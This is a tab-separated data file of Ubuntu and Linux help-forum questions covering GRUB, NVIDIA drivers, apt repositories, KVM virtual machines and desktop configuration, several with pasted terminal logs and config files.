226347	how do i define the window icon used by window managers ?	i would like to change the icons displayed in window title bars : the window icons appear to be unrelated to the icons used by launchers and docks , as they do n't follow the ones defined in their respective .desktop files . in the example above the lower window ( recoll ) is lacking a proper icon and showing a stock one instead , even though its launcher comes with an icon . so my question is : where can i find these window icons in my filesystem and how do i define a new one for an application of my choice ?
226358	13.04 dash icon and ubuntu gnome-classic issues	the dash icon for ubuntu 13.04 was `` released '' , and a how-to on omg ! ubuntu ! was written . now , i followed all of the instructions , and the assets installed fine . oh they installed alright , and now i ca n't get rid of them ! i went through the multiple posts , but since this seems to be a new problem , none of the answers were working , and nothing new was appearing ! so what i did , was i went into gnome-classic , just for old times sake , and i wanted to hide from the new 13.04 icons i did n't really take to . and of course what should appear covering my top , and bottom panels , but the unity dock , with it 's 13.04 dash icon and everything . wait , how did unity make it 's way into my gnome-classic environment ? i 'm not really sure , but after about an hour of fooling around with unity-tweak and the compiz configuration , i needed something new . would it be a bad idea to reinstall ? at this point , nothing much would be lost , but i would like to stray from that idea .
226360	ubuntu 12.10 - how to get sip phone twinkle latest version working using deb or already existing package from any repository ?	in fedora , archlinux twinkle works without any problem just using there default package installer . but since in ubuntu 12.10 there is not anymore this package available using apt-get install twinkle how to get this package installed using apt-get ?
226368	editing a command-line argument to create a new variable	i have a bash script called test.sh that uses command-line argument : lynx -dump $ 1 > $ name '' .txt '' but i need name to be created from the argument by specific keywords in the argument . an example is : http : //www.pcmag.com/article2/0,2817,2412941,00.asp http : //www.pcmag.com/article2/0,2817,2412919,00.asp both are two separate articles but are the difference can only be seen in those 12 characters . how do i create a variable from a url for those 12 characters ? so that when i run test.sh in terminal : ./test.sh http : //www.pcmag.com/article2/0,2817,2412941,00.asp there is a text file saved as 0,2817,2412941,00 ?
226372	ca n't get recovery mode in grub	my grub does n't have a recovery mode boot option . i changed my login screen settings and used some non-existing theme because of which my computer never boots . the loading screen appears but login screen never appears . it keeps on loading ... .. i ca n't go into recovery mode even . thanks !
226375	windows server 2008 in kvm	i 've been working on getting a windows server 2008 kvm in my linux box running ubuntu server 12.04 . i 've got virt-install and virt-manager installed , got the install up and running via virt-install -- connect qemu : ///system -n winsvr2008 -r 1024 -- vcpus=1 -- disk path=/home/pwnd/vm/2008.img , size=30 -c /home/pwnd/en_windows_server_2008_with_sp2_x86_dvd_342333.iso -- graphics vnc , listen=192.168.1.127 -- noautoconsole -- os-type=windows -- os-variant=win2k8 -- network=bridge : virbr0 -- hvm -v and virsh vncdisplay winsvr2008 i can connect and view , but upon starting , i get hung up on please wait right after clicking install . any ideas ?
226376	usb scanners not coming through on ltsp clients	have 30 workstations all running nicely on ltsp , each running ubuntu . bought 5 epson v33 scanners , which of course worked fine on local ubuntu installs . when these clients are running through ltsp the scanners are not detected . can anyone lend a hand with this ? or give any ideas ? usb flash drives , keyboards , mice etc all come through nicely . thanks in advance
226379	printing goes to queue only	my 12.04 machine sees the printer , a canon bjc-1000 . print request of any kind including test pages will be sent to queue and kept there . i can purge them but not make it print . is there a compatibility problem ?
226381	how do i install ralink 3290 ?	i have been trying for awhile since i removed win8 from my laptop to get this bluetooth/wireless card working and i 've got it so that it at least recognizes wireless , but every time i try to actually use the wireless , i get kernel panics or everything crashes . can someone explain to me how to install this driver : http : //www.ralinktech.com/en/04_support/support.php ? sn=501 so that i can actually use the wireless on my laptop ( and perhaps even the bluetooth ) .
226386	ubuntu 12.04 lts on inspiron n5110 ?	i 'm new to ubuntu and i want to run dual boot ubuntu and windows 8 on my dell inspiron n5110 . i have gone through many sites for the installation guides but now i got confused because ubuntu officially certified the lts version for n5110 but there are some cases where people are facing issues and posting on the community . should i install ubuntu 12.04 or some other version to my notebook ? i also need to use oracle .
226387	ubuntu 12.10 multi-monitor setup is n't working	i have tried everything i can think of and ca n't get a multi monitor setup working . can anyone please point me in the right direction ? my setup : asus g75vw with nvidia 670m ( supports 3 external monitors via vga/hdmi/dp - http : //answers.yahoo.com/question/index ? qid=20121023062214aa7o5jc ) samsung 27 '' lcd ( 2 ) lg 22 '' lcds lspci results : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.4 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 5 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 1213 ( rev a1 ) 01:00.1 audio device : nvidia corporation gf114 hdmi audio controller ( rev a1 ) 03:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 04:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) my xrandr output : screen 0 : minimum 8 x 8 , current 3600 x 1080 , maximum 16384 x 16384 vga-0 connected 1680x1050+1920+0 ( normal left inverted right x axis y axis ) 474mm x 296mm 1680x1050 59.9*+ 60.0 1440x900 75.0 59.9 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.0 60.0 800x600 75.0 60.3 56.2 640x480 75.0 59.9 lvds-0 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 382mm x 215mm 1920x1080 60.0*+ 40.0 dp-0 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + 59.9 30.0 24.0 30.0 30.0 1680x1050 60.0 1600x900 60.0 1440x900 59.9 1366x768 59.8 1280x1024 75.0 60.0 1280x800 59.8 1280x720 60.0 59.9 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 720x480 59.9 30.0 640x480 75.0 72.8 59.9 dp-1 disconnected ( normal left inverted right x axis y axis ) vga-0 is my lg , and lvds-0 is my laptop screen . they are both working properly right now with no xorg.conf enabled during boot . hdmi-0 is connected to the samsung and is black . dp-0 will be used with the second lg once i get 2 working ! my /etc/x11/xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.51 ( buildd @ batsu ) fri oct 12 12:53:54 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` chi mei optoelectronics corp. '' horizsync 44.4 - 67.1 vertrefresh 40.0 - 60.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` samsung t27b750 '' horizsync 15.0 - 81.0 vertrefresh 24.0 - 75.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor2 '' vendorname `` unknown '' modelname `` lg electronics l222w '' horizsync 28.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 670m '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 670m '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 670m '' busid `` pci:1:0:0 '' screen 2 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` twinview '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : 1920x1080_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-2 : 1920x1080_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` twinview '' `` 0 '' option `` metamodes '' `` crt : 1680x1050_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection what am i missing to get 2-3 external monitors working ?
226389	why does wine need windows service pack ?	on my system there 's a file windowsxp-kb936929-sp3-x86-enu.exe in /home/kshitiz/.playonlinux/ressources why does wine need this file ? if it needs it for emulation , how is it that it is able to emulate windows xp without downloading the xp setup ? and i do n't see the extracted contents of that file . how is it being used ?
226391	system getting shutdown automotacally	my ubuntu 12.04 lts gets shutdown automatically by 11 am . i 've cleared all my scheduled tasks but then getting shutdown . help me sort out this . thanks in advance .
226395	packages are not available for installation	changing some software update settings i possibly corrupted something , and now i do n't see many packages in the list . for example : alex @ u120464 : ~ $ sudo apt-get install codeblocks [ sudo ] password for alex : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package codeblocks i checked all options in the software sources dialog , but packages are still not available . how can i fix this ? os : ubuntu 12.04 , 64 bit . additional information . alex @ u120464 : ~ $ sudo apt-get update [ sudo ] password for alex : ign http : //extras.ubuntu.com precise inrelease ign http : //security.ubuntu.com precise-security inrelease ign http : //archive.canonical.com precise inrelease ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ... it looks like most ubuntu repositories are not searched , how can i restore default update behaviour ? edit . finally , the problem was solved by copying /etc/apt/source.list file from another computer . this is the offending file content : # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //il.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //il.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb http : //mirror.sov.uk.goscomb.net/ubuntu/ precise main universe restricted multiverse deb-src http : //mirror.sov.uk.goscomb.net/ubuntu/ precise universe main multiverse restricted # added by software-properties deb http : //security.ubuntu.com/ubuntu/ precise-security universe main multiverse restricted deb http : //mirror.sov.uk.goscomb.net/ubuntu/ precise-updates universe main multiverse restricted deb http : //mirror.sov.uk.goscomb.net/ubuntu/ precise-backports universe main multiverse restricted deb-src http : //extras.ubuntu.com/ubuntu precise main
226397	how to install older version of libgl1-mesa-dev	i had a problem with maya not running ( crashing with signal 11 ) cause of some recent updates which corrupted somehow libgl mesa dev . i managed to get aroung that crash with removing libgl1-mesa-dev but now i ca n't get working the enhanced viewport.. so my question is how to force install previous libgl1 mesa dev version.. ? ?
226401	application autostart after system boot for a random interval	reading 'sleep ' mans and googling have n't provide any useful information . i want to run pidgin after ubuntu boots , but after some time left . for example , logon is passed , and after interval for 1 to 5 minutes pidgin starts . as manuals of 'sleep ' says , there a way to specify only number of hours , mins and seconds . is there any way/other linux command to solve my problem ?
226402	ubuntu update deleted entries from grub	my computer currently has fedora , ubuntu , and windows installed . i just updated ubuntu 12.04 , and on restarting , the fedora entry was gone from grub . ubuntu and windows remained , though . i have looked at these threads : fedora login gone after ubuntu updates on a dual boot http : //forums.fedoraforum.org/showthread.php ? t=279221 grub 's menu.lst deleted after a kernel update however , i can not figure out how to mount the drive as suggested . it does not appear in the list on the left side of nautilus as shown in the links above . i also tried running the following as suggested above : sudo grub-install /dev/sdx sudo update-grub but this gave scary errors : /usr/sbin/grub-setup : warn : attempting to install grub to a partitionless disk or to a partition . this is a bad idea.. /usr/sbin/grub-setup : warn : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/grub-setup : error : will not proceed with blocklists . the highlighted drive below is where fedora lives . thanks for any help reversing ubuntu 's decision to delete this from grub .
226403	remote access a duel boot os ?	i 've had problems with virtual box in the past , and i feel more comfortable running a duel boot with ubuntu and windows 8 , but it can be tiring having to turn off the computer when i need to skype or upload pictures onto my windows 8 ( main os ) account . is there any way i can remote access my ubuntu os from inside windows , or vise versa ( which ever would be easier ) ? im trying to find an efficient way to switch between my os systems without the painstaking shut down and start up .
226408	no plymouth splash screen after upgrade from 12.04 to 12.10	i upgraded from 12.04 to 12.10 and got only a fleeting glimpse of the plymouth ubuntu 12.10 in text , not the logo , when booting up . a black screen flashed then a blank purple screen shows at which point i got the quick glimpse of the plymouth text , if if i was lucky enough to see it all . strange , because when i first upgraded it worked fine . at no point since the upgrade , however has the shutdown screen shown the plymouth logo , now all i see is a purple screen with some white text and a cursor flashing on the left hand side . the text reads as follows : ubuntu 12.10 ok killing all remaining processes fail ( in red letters ) i posted this problem in launchpad and was given the following advice ; i was to run this command in the terminal sudo lshw -c display ; lsb_release -a ; uname -a and give the output from it , which was as follows : *-display description : vga compatible controller product : gt216 [ geforce gt 220 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : d2000000-d2ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:2000 ( size=128 ) memory : d3080000-d30fffff no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal linux debbie-gt5042b 3.5.0-19-generic # 30-ubuntu smp tue nov 13 17:49:53 utc 2012 i686 i686 i686 gnu/linux then i was told to give the output of dpkg -l | grep nvidia which was ii nvidia-common 1:0.2.71.1 i386 transitional package for ubuntu-drivers-common ii nvidia-current 304.51.really.304.43-0ubuntu1 i386 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings 304.51-0ubuntu2 i386 tool for configuring the nvidia graphics driver then i was told the answer to all this would be to run the following into the terminal ; sudo apt-get -- purge remove nvidia-current nvidia-settings sudo apt-get -- purge autoremove sudo apt-get clean sudo apt-get update sudo apt-get install nvidia-current this has made no difference whatsoever , i still get the flashing black screen at startup and the text , with processes shutdown when i turn off my computer ; in other words still no logo . this was the output from the terminal when i ran the above commands ; debbie @ debbie-gt5042b : ~ $ sudo apt-get -- purge remove nvidia-current nvidia-settings [ sudo ] password for debbie : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libept1.4.12 libvte-common libvte9 use 'apt-get autoremove ' to remove them . the following packages will be removed nvidia-current* nvidia-settings* 0 upgraded , 0 newly installed , 2 to remove and 3 not upgraded . after this operation , 112 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 171797 files and directories currently installed . ) removing nvidia-current ... removing all dkms modules done . update-alternatives : removing manually selected alternative - switching i386-linux-gnu_gl_conf to auto mode update-alternatives : using /usr/lib/i386-linux-gnu/mesa/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-alternatives : removing manually selected alternative - switching x86_64-linux-gnu_gl_conf to auto mode info : disable nvidia-current debug : parsing /usr/share/ubuntu-drivers-common/quirks/lenovo_thinkpad debug : parsing /usr/share/ubuntu-drivers-common/quirks/put_your_quirks_here debug : parsing /usr/share/ubuntu-drivers-common/quirks/dell_latitude debug : processing quirk thinkpad t420s debug : failure to match gateway with lenovo debug : quirk does n't match debug : processing quirk latitude e6530 debug : failure to match gateway with dell inc. debug : quirk does n't match update-initramfs : deferring update ( trigger activated ) purging configuration files for nvidia-current ... update-initramfs : deferring update ( trigger activated ) removing nvidia-settings ... purging configuration files for nvidia-settings ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-19-generic debbie @ debbie-gt5042b : ~ $ sudo apt-get -- purge autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed dkms* fakeroot* libept1.4.12* libvte-common* libvte9* screen-resolution-extra* 0 upgraded , 0 newly installed , 6 to remove and 3 not upgraded . after this operation , 2,680 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 171566 files and directories currently installed . ) removing dkms ... purging configuration files for dkms ... removing fakeroot ... update-alternatives : using /usr/bin/fakeroot-tcp to provide /usr/bin/fakeroot ( fakeroot ) in auto mode purging configuration files for fakeroot ... removing libept1.4.12 ... purging configuration files for libept1.4.12 ... removing libvte9 ... purging configuration files for libvte9 ... removing libvte-common ... removing screen-resolution-extra ... purging configuration files for screen-resolution-extra ... processing triggers for man-db ... processing triggers for libc-bin ... ldconfig deferred processing now taking place debbie @ debbie-gt5042b : ~ $ sudo apt-get clean debbie @ debbie-gt5042b : ~ $ sudo apt-get update ign http : //security.ubuntu.com quantal-security inrelease ign http : //gb.archive.ubuntu.com quantal inrelease get:1 http : //security.ubuntu.com quantal-security release.gpg [ 933 b ] ign http : //gb.archive.ubuntu.com quantal-updates inrelease get:2 http : //security.ubuntu.com quantal-security release [ 49.6 kb ] ign http : //gb.archive.ubuntu.com quantal-backports inrelease hit http : //gb.archive.ubuntu.com quantal release.gpg get:3 http : //gb.archive.ubuntu.com quantal-updates release.gpg [ 933 b ] hit http : //gb.archive.ubuntu.com quantal-backports release.gpg hit http : //gb.archive.ubuntu.com quantal release get:4 http : //gb.archive.ubuntu.com quantal-updates release [ 49.6 kb ] get:5 http : //security.ubuntu.com quantal-security/main sources [ 19.5 kb ] get:6 http : //security.ubuntu.com quantal-security/restricted sources [ 14 b ] hit http : //gb.archive.ubuntu.com quantal-backports release get:7 http : //security.ubuntu.com quantal-security/universe sources [ 6,763 b ] hit http : //gb.archive.ubuntu.com quantal/main sources get:8 http : //security.ubuntu.com quantal-security/multiverse sources [ 695 b ] hit http : //gb.archive.ubuntu.com quantal/restricted sources get:9 http : //security.ubuntu.com quantal-security/main i386 packages [ 54.8 kb ] hit http : //gb.archive.ubuntu.com quantal/universe sources hit http : //gb.archive.ubuntu.com quantal/multiverse sources hit http : //gb.archive.ubuntu.com quantal/main i386 packages get:10 http : //security.ubuntu.com quantal-security/restricted i386 packages [ 14 b ] hit http : //gb.archive.ubuntu.com quantal/restricted i386 packages get:11 http : //security.ubuntu.com quantal-security/universe i386 packages [ 16.8 kb ] hit http : //gb.archive.ubuntu.com quantal/universe i386 packages get:12 http : //security.ubuntu.com quantal-security/multiverse i386 packages [ 1,394 b ] hit http : //gb.archive.ubuntu.com quantal/multiverse i386 packages get:13 http : //security.ubuntu.com quantal-security/main translation-en [ 26.4 kb ] hit http : //gb.archive.ubuntu.com quantal/main translation-en_gb hit http : //security.ubuntu.com quantal-security/multiverse translation-en hit http : //gb.archive.ubuntu.com quantal/main translation-en hit http : //gb.archive.ubuntu.com quantal/multiverse translation-en_gb hit http : //gb.archive.ubuntu.com quantal/multiverse translation-en hit http : //gb.archive.ubuntu.com quantal/restricted translation-en_gb hit http : //security.ubuntu.com quantal-security/restricted translation-en hit http : //gb.archive.ubuntu.com quantal/restricted translation-en hit http : //gb.archive.ubuntu.com quantal/universe translation-en_gb get:14 http : //security.ubuntu.com quantal-security/universe translation-en [ 9,362 b ] hit http : //gb.archive.ubuntu.com quantal/universe translation-en get:15 http : //gb.archive.ubuntu.com quantal-updates/main sources [ 49.2 kb ] get:16 http : //gb.archive.ubuntu.com quantal-updates/restricted sources [ 889 b ] get:17 http : //gb.archive.ubuntu.com quantal-updates/universe sources [ 21.9 kb ] get:18 http : //gb.archive.ubuntu.com quantal-updates/multiverse sources [ 2,940 b ] get:19 http : //gb.archive.ubuntu.com quantal-updates/main i386 packages [ 126 kb ] get:20 http : //gb.archive.ubuntu.com quantal-updates/restricted i386 packages [ 1,979 b ] get:21 http : //gb.archive.ubuntu.com quantal-updates/universe i386 packages [ 66.1 kb ] ign http : //security.ubuntu.com quantal-security/main translation-en_gb ign http : //security.ubuntu.com quantal-security/multiverse translation-en_gb get:22 http : //gb.archive.ubuntu.com quantal-updates/multiverse i386 packages [ 8,121 b ] ign http : //security.ubuntu.com quantal-security/restricted translation-en_gb ign http : //security.ubuntu.com quantal-security/universe translation-en_gb get:23 http : //gb.archive.ubuntu.com quantal-updates/main translation-en [ 62.6 kb ] hit http : //gb.archive.ubuntu.com quantal-updates/multiverse translation-en hit http : //gb.archive.ubuntu.com quantal-updates/restricted translation-en get:24 http : //gb.archive.ubuntu.com quantal-updates/universe translation-en [ 39.2 kb ] hit http : //gb.archive.ubuntu.com quantal-backports/main sources hit http : //gb.archive.ubuntu.com quantal-backports/restricted sources hit http : //gb.archive.ubuntu.com quantal-backports/universe sources hit http : //gb.archive.ubuntu.com quantal-backports/multiverse sources hit http : //gb.archive.ubuntu.com quantal-backports/main i386 packages hit http : //gb.archive.ubuntu.com quantal-backports/restricted i386 packages hit http : //gb.archive.ubuntu.com quantal-backports/universe i386 packages hit http : //gb.archive.ubuntu.com quantal-backports/multiverse i386 packages hit http : //gb.archive.ubuntu.com quantal-backports/main translation-en hit http : //gb.archive.ubuntu.com quantal-backports/multiverse translation-en hit http : //gb.archive.ubuntu.com quantal-backports/restricted translation-en hit http : //gb.archive.ubuntu.com quantal-backports/universe translation-en ign http : //gb.archive.ubuntu.com quantal-updates/main translation-en_gb ign http : //gb.archive.ubuntu.com quantal-updates/multiverse translation-en_gb ign http : //gb.archive.ubuntu.com quantal-updates/restricted translation-en_gb ign http : //gb.archive.ubuntu.com quantal-updates/universe translation-en_gb ign http : //gb.archive.ubuntu.com quantal-backports/main translation-en_gb ign http : //gb.archive.ubuntu.com quantal-backports/multiverse translation-en_gb ign http : //gb.archive.ubuntu.com quantal-backports/restricted translation-en_gb ign http : //gb.archive.ubuntu.com quantal-backports/universe translation-en_gb fetched 615 kb in 4s ( 154 kb/s ) reading package lists ... done debbie @ debbie-gt5042b : ~ $ sudo apt-get install nvidia-current reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : dkms fakeroot nvidia-settings screen-resolution-extra suggested packages : dpkg-dev debhelper the following new packages will be installed dkms fakeroot nvidia-current nvidia-settings screen-resolution-extra 0 upgraded , 5 newly installed , 0 to remove and 11 not upgraded . need to get 40.1 mb of archives . after this operation , 113 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main dkms all 2.2.0.3-1.1ubuntu1 [ 72.8 kb ] get:2 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main fakeroot i386 1.18.4-2 [ 88.0 kb ] get:3 http : //gb.archive.ubuntu.com/ubuntu/ quantal/restricted nvidia-current i386 304.51.really.304.43-0ubuntu1 [ 38.1 mb ] get:4 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main screen-resolution-extra all 0.15 [ 13.1 kb ] get:5 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main nvidia-settings i386 304.51-0ubuntu2 [ 1,803 kb ] fetched 40.1 mb in 26s ( 1,529 kb/s ) selecting previously unselected package dkms . ( reading database ... 171431 files and directories currently installed . ) unpacking dkms ( from ... /dkms_2.2.0.3-1.1ubuntu1_all.deb ) ... selecting previously unselected package fakeroot . unpacking fakeroot ( from ... /fakeroot_1.18.4-2_i386.deb ) ... selecting previously unselected package nvidia-current . unpacking nvidia-current ( from ... /nvidia-current_304.51.really.304.43-0ubuntu1_i386.deb ) ... selecting previously unselected package screen-resolution-extra . unpacking screen-resolution-extra ( from ... /screen-resolution-extra_0.15_all.deb ) ... selecting previously unselected package nvidia-settings . unpacking nvidia-settings ( from ... /nvidia-settings_304.51-0ubuntu2_i386.deb ) ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up dkms ( 2.2.0.3-1.1ubuntu1 ) ... setting up fakeroot ( 1.18.4-2 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode setting up nvidia-current ( 304.51.really.304.43-0ubuntu1 ) ... update-alternatives : using /usr/lib/nvidia-current/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-alternatives : warning : skip creation of /usr/lib32/libopencl.so because associated file /usr/lib32/nvidia-current/libopencl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : warning : skip creation of /usr/lib32/vdpau/libvdpau_nvidia.so.1 because associated file /usr/lib32/nvidia-current/vdpau/libvdpau_nvidia.so.1 ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : warning : skip creation of /usr/lib32/libvdpau_nvidia.so because associated file /usr/lib32/nvidia-current/vdpau/libvdpau_nvidia.so ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : using /usr/lib/nvidia-current/alt_ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode update-initramfs : deferring update ( trigger activated ) info : enable nvidia-current debug : parsing /usr/share/ubuntu-drivers-common/quirks/lenovo_thinkpad debug : parsing /usr/share/ubuntu-drivers-common/quirks/put_your_quirks_here debug : parsing /usr/share/ubuntu-drivers-common/quirks/dell_latitude debug : processing quirk thinkpad t420s debug : failure to match gateway with lenovo debug : quirk does n't match debug : processing quirk latitude e6530 debug : failure to match gateway with dell inc. debug : quirk does n't match loading new nvidia-current-304.43 dkms files ... first installation : checking all kernels ... building only for 3.5.0-19-generic building for architecture i686 building initial module for 3.5.0-19-generic done . nvidia_current : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-19-generic/updates/dkms/ depmod ... . dkms : install completed . setting up screen-resolution-extra ( 0.15 ) ... setting up nvidia-settings ( 304.51-0ubuntu2 ) ... update-alternatives : warning : forcing reinstallation of alternative /usr/lib/nvidia-settings/ld.so.conf because link group nvidia_settings_conf is broken processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-19-generic debbie @ debbie-gt5042b : ~ $ since this has n't worked , is there any way of reversing what i 've done in the terminal ? is there someone out there who can help with this problem ? my post in launchpad at the moment has become stagnant and i 'm wanting to get this sorted out . many thanks , debbie
226412	nvidia drivers , repo v.s website	i know the way to install both , i managed to get both working as it should , now im asking , which is better ? as for your experience is there a different between nvidia-experimental-310 from repo and the binary installation from nvidia website ?
226417	short-cut for switching to a given directory	in the ubuntu terminal i find myself spending considerable time to switch to a particular directory every time the computer starts up . is there some way i can make this process easier ? is there some hotkey or some quick directory change that i can use ( like speed dial on a phone ) ? eg : cd 1 : changes to saved directory one
226418	why does 'top ' say that there are two users when i have only created one ?	and how do i find out what the other user name is ? i tried cat /etc/passwd but this gives me a long list of stuff which is basically unintelligible to me .
